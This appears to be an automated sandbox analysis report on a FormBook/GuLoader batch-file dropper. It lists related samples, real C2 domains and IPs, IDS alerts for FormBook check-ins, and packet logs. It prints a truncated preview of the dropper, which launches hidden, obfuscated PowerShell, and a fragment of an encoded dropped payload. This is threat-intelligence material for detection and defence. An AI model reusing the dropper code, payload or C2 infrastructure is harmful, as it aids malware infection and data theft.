                              f4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
                              • www.theplays.shop/gnbc/
                              47.91.88.207Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                PO_La-Tannerie04190240419.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                  Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                    PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                      f4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        www.fleksibox.storef4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
                                        • 45.130.41.4
                                        www.theplays.shopPedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 172.67.152.117
                                        PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 104.21.74.5
                                        f4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
                                        • 172.67.152.117
                                        BoTl06PDGl.exeGet hashmaliciousFormBookBrowse
                                        • 104.21.74.5
                                        www.tyaer.comPedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 47.91.88.207
                                        PO_La-Tannerie04190240419.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 47.91.88.207
                                        Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 47.91.88.207
                                        PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 47.91.88.207
                                        f4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
                                        • 47.91.88.207
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        NET1-ASBGPedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 87.121.105.163
                                        SecuriteInfo.com.Win64.TrojanX-gen.17982.17306.exeGet hashmaliciousAsyncRATBrowse
                                        • 94.156.8.44
                                        8awpc7GpMh.elfGet hashmaliciousUnknownBrowse
                                        • 94.156.79.77
                                        JU8juw0kr0.elfGet hashmaliciousUnknownBrowse
                                        • 94.156.79.77
                                        6WfrjCTjs8.elfGet hashmaliciousUnknownBrowse
                                        • 94.156.79.77
                                        mJ4CsuZhyr.elfGet hashmaliciousMiraiBrowse
                                        • 94.156.79.77
                                        W46ssx5gcI.elfGet hashmaliciousUnknownBrowse
                                        • 94.156.79.77
                                        Y04kc90KjB.elfGet hashmaliciousUnknownBrowse
                                        • 94.156.79.77
                                        BN34UR6QlT.elfGet hashmaliciousUnknownBrowse
                                        • 94.156.79.77
                                        cG1d8L6E2V.elfGet hashmaliciousUnknownBrowse
                                        • 94.156.79.77
                                        CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCPedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 47.91.88.207
                                        xzk9TKqNoI.elfGet hashmaliciousMiraiBrowse
                                        • 147.139.212.194
                                        b3astmode.x86.elfGet hashmaliciousUnknownBrowse
                                        • 8.220.214.169
                                        PO_La-Tannerie04190240419.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 47.91.88.207
                                        Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 47.91.88.207
                                        2.jpg.exeGet hashmaliciousCobaltStrike, Metasploit, ReflectiveLoaderBrowse
                                        • 8.218.236.5
                                        http://www.sushi-idea.comGet hashmaliciousUnknownBrowse
                                        • 47.246.136.185
                                        SecuriteInfo.com.Trojan.KillProc2.23108.29569.31585.exeGet hashmaliciousUnknownBrowse
                                        • 47.243.79.202
                                        PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 47.91.88.207
                                        CLOUDFLARENETUShttps://www.maultalk.com/url.php?to=https://www.serserijeans.com/gdy9haBM2BM2Fe5rss3RhBM2i2Pdk17x0qvi2PFe5nnaai2PrpWO3rk17dy9s3RWO3BM2Get hashmaliciousUnknownBrowse
                                        • 172.67.129.156
                                        https://dl.download-ai.top/Get hashmaliciousUnknownBrowse
                                        • 172.67.171.170
                                        IPrstVM17M.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.161.186
                                        IPrstVM17M.exeGet hashmaliciousUnknownBrowse
                                        • 172.67.161.186
                                        QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 172.67.200.96
                                        http://web-hosts.ioGet hashmaliciousUnknownBrowse
                                        • 172.66.40.168
                                        DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                        • 104.26.13.205
                                        SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                        • 104.21.65.24
                                        SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtfGet hashmaliciousRemcosBrowse
                                        • 172.67.215.45
                                        DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                        • 104.21.27.85
                                        No context
                                        No context
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):11608
                                        Entropy (8bit):4.886255615007755
                                        Encrypted:false
                                        SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                        MD5:C7F7A26360E678A83AFAB85054B538EA
                                        SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                        SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                        SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                        Malicious:false
                                        Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.9260988789684415
                                        Encrypted:false
                                        SSDEEP:3:Nlllulb/lj:NllUb/l
                                        MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                        SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                        SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                        SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                        Malicious:false
                                        Preview:@...e................................................@..........
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\AtBroker.exe
                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                        Category:dropped
                                        Size (bytes):122880
                                        Entropy (8bit):1.1414673161713362
                                        Encrypted:false
                                        SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                        MD5:24937DB267D854F3EF5453E2E54EA21B
                                        SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                        SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                        SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                        Malicious:false
                                        Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):6222
                                        Entropy (8bit):3.7416005332710123
                                        Encrypted:false
                                        SSDEEP:96:G2GBBCbG5u5kvhkvCCteCDz4wHP/BCDz4CHP/S:G2GVm7D0K/YD0E/S
                                        MD5:B77A14ABEBCF59A4C2180ADF0064D15E
                                        SHA1:1903EDC22DF1EFF70582AC770FFA0A02A5692168
                                        SHA-256:7FEB891ABCD5A14FC8FCF9D0378053E6AB9AAB0CD2C271208B6EFBF1057D18C1
                                        SHA-512:0A7800BAE0A9E3143A69E818ACE19FEBF05BDEAE610A24747679D271AC6940757B95878B9212C06E69801FF9BD10D6EDF416EB3326D81E35C6EB4427CE7DB829
                                        Malicious:false
                                        Preview:...................................FL..................F.".. ...;.}.S...5..-...z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...A.-...k..-.......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.X.O....B......................A!.A.p.p.D.a.t.a...B.V.1......X.O..Roaming.@......"S.X.O....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.X.T....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......X.W..Windows.@......"S.X.W....F......................C!.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.X.W....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.X.W....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.X.S....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.X.O....i...........
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):6222
                                        Entropy (8bit):3.7416005332710123
                                        Encrypted:false
                                        SSDEEP:96:G2GBBCbG5u5kvhkvCCteCDz4wHP/BCDz4CHP/S:G2GVm7D0K/YD0E/S
                                        MD5:B77A14ABEBCF59A4C2180ADF0064D15E
                                        SHA1:1903EDC22DF1EFF70582AC770FFA0A02A5692168
                                        SHA-256:7FEB891ABCD5A14FC8FCF9D0378053E6AB9AAB0CD2C271208B6EFBF1057D18C1
                                        SHA-512:0A7800BAE0A9E3143A69E818ACE19FEBF05BDEAE610A24747679D271AC6940757B95878B9212C06E69801FF9BD10D6EDF416EB3326D81E35C6EB4427CE7DB829
                                        Malicious:false
                                        Preview:...................................FL..................F.".. ...;.}.S...5..-...z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...A.-...k..-.......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.X.O....B......................A!.A.p.p.D.a.t.a...B.V.1......X.O..Roaming.@......"S.X.O....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.X.T....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......X.W..Windows.@......"S.X.W....F......................C!.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.X.W....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.X.W....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.X.S....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.X.O....i...........
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:dropped
                                        Size (bytes):433320
                                        Entropy (8bit):5.973584255589444
                                        Encrypted:false
                                        SSDEEP:12288:y1v3TQm2J1OP2OXhRgc/U2eVV+R20PS92bS159WKn:yu1OP2iOmPP20u
                                        MD5:AFA53B8E088E16EF3F4539A37868CBE2
                                        SHA1:D0E4F49E45364EDC72A0FC12CF63305F1FE5CD4E
                                        SHA-256:97A181CE91FA4F01433142166A755474A85300D716BF182DF54D5A5FF8CA69EC
                                        SHA-512:D37A7E5B1AD85865AC937CFC8AB097634AE3559AFA5388B01932F892A8043E4044C3F37A1642A6A3C9943D630FFCEBAE98B67FC7065FA6A5DACB37ED5B12CEF1
                                        Malicious:false
                                        Preview:cQGb6wKAL7sUXg8A6wI1AnEBmwNcJARxAZtxAZu5Q39FAnEBm3EBm4HB+3+MG3EBm+sCxX6B8T7/0R1xAZtxAZvrAqBrcQGbugQnTRlxAZvrAvSC6wLFoXEBmzHK6wIdzHEBm4kUC3EBm+sChlzR4usCTzzrAptfg8EEcQGb6wITc4H5rBQtBHzK6wIytHEBm4tEJATrApozcQGbicPrAnYOcQGbgcMzvm8C6wIoNnEBm7qlhSkd6wK5p+sCGGyB6nVtb+nrAvJpcQGbgfIwGLozcQGbcQGb6wLfBHEBm3EBm+sCcAaLDBDrAhwx6wJSZokME+sCbyDrArRhQnEBm+sCYNSB+uyQBAB10+sCgJbrAk6LiVwkDOsCpGLrAlSLge0AAwAA6wKydXEBm4tUJAjrAjcTcQGbi3wkBOsCLMzrAqqbievrAn7s6wK1K4HDnAAAAOsCpmpxAZtTcQGbcQGbakBxAZtxAZuJ63EBm+sCuyvHgwABAAAAgD8E6wKdqnEBm4HDAAEAAHEBm3EBm1NxAZvrAkdHievrAl+g6wLc/Ym7BAEAAHEBm+sCebKBwwQBAADrAmWj6wLbU1NxAZtxAZtq/3EBm3EBm4PCBXEBm3EBmzH26wK2XnEBmzHJ6wJ9H3EBm4sa6wLxJusCuL1BcQGbcQGbORwKdfTrAvnO6wKslEZxAZvrAqpLgHwK+7h13esCz8rrAod5i0QK/HEBm3EBmynw6wJhCesCLL//0usCzvpxAZu67JAEAHEBm+sCs5oxwOsCz3nrAvVXi3wkDOsCT1NxAZuBNAc02JDKcQGb6wJY9oPABHEBm3EBmznQdeXrArEmcQGbiftxAZvrArx0/9dxAZvrAizTUuFK8/bgW0PRUeVZiviPLZtZZtpHTkxL2uPWCF1ZZj8Sd5njwFPlWWFRdfLtYeA3ttOoCLUxUhSJBBELEV81BbACESOPffo085ydygh9aI61rJ3K+ixDSVLhUfLIWeTH
                                        File type:ASCII text, with very long lines (2827), with no line terminators
                                        Entropy (8bit):5.4243340638143875
                                        TrID:
                                          File name:PO_La-Tanerie04180240124.bat
                                          File size:2'827 bytes
                                          MD5:dd4839ecc1b0a5b2f98415fe36f4e848
                                          SHA1:20389c69b3069faafc09c4adf7d98b9f36f305f9
                                          SHA256:7c9bff4d76e487e274fe0f7a323f55d6c74de2a809f1c646a2dbad3417c3229f
                                          SHA512:93e820c703f7cf5d34f0b989e200b47b10c816ee2d823c1e56cb13443a5fb3ac39c9c8336bd71df87b0b2ea447707390f7daccf41b43ea7d178fa1e7ac08a17c
                                          SSDEEP:48:vOlJ2LVrJonUn4n+yCB6xHyN4EI93ubvP:WlILVrJvOn0xw2vP
                                          TLSH:DD51431BB302FB98C4678519EBF65049863154962D0D1663BC1D62346D68709B27FCBF
                                          File Content Preview:start /min powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify
                                          Icon Hash:9686878b929a9886
                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          04/24/24-11:57:58.501990TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25031680192.168.11.2047.91.88.207
                                          04/24/24-11:58:54.980178TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25032280192.168.11.20172.67.152.117
                                          04/24/24-11:58:49.607288TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35032080192.168.11.20172.67.152.117
                                          04/24/24-11:58:46.928010TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M35031980192.168.11.20172.67.152.117
                                          TimestampSource PortDest PortSource IPDest IP
                                          Apr 24, 2024 11:56:53.417608023 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:53.722206116 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:53.722342968 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:53.722626925 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.027028084 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.028836966 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.028928041 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.029012918 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.029027939 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.029040098 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.029051065 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.029062986 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.029073954 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.029084921 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.029093027 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.029095888 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.029161930 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.029232025 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.029232025 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.029294014 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.335503101 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.335516930 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.335604906 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.335618973 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.335629940 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.335640907 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.335694075 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.335756063 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.335767984 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.335814953 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.335880041 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.335895061 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.335906029 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.335916996 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.335927963 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.335938931 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.335948944 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.335959911 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.336030960 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.336030960 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.336095095 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.336110115 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.336121082 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.336127996 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.336132050 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.336143017 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.336251020 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.336316109 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.640557051 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.640572071 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.640657902 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.640672922 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.640685081 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.640718937 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.640770912 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.640785933 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.640862942 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.640927076 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.640928030 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.641045094 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641149998 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641159058 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.641181946 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641192913 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641258001 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641269922 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641280890 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641305923 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641318083 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641328096 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.641329050 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641359091 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641370058 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641407013 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.641412020 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641484022 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.641518116 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641529083 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641531944 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.641540051 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641551018 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641619921 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641630888 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641674042 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641680002 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.641685009 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641727924 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.641776085 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.641782045 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641793966 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641803980 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641814947 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641825914 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641834974 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.641835928 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641885042 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641896009 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641906977 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641917944 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641926050 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.641930103 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.641974926 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.642024040 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.642072916 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.642072916 CEST5031480192.168.11.2087.121.105.163
                                          Apr 24, 2024 11:56:54.945254087 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.945350885 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.945364952 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.945377111 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.945481062 CEST805031487.121.105.163192.168.11.20
                                          Apr 24, 2024 11:56:54.945494890 CEST805031487.121.105.163192.168.11.20
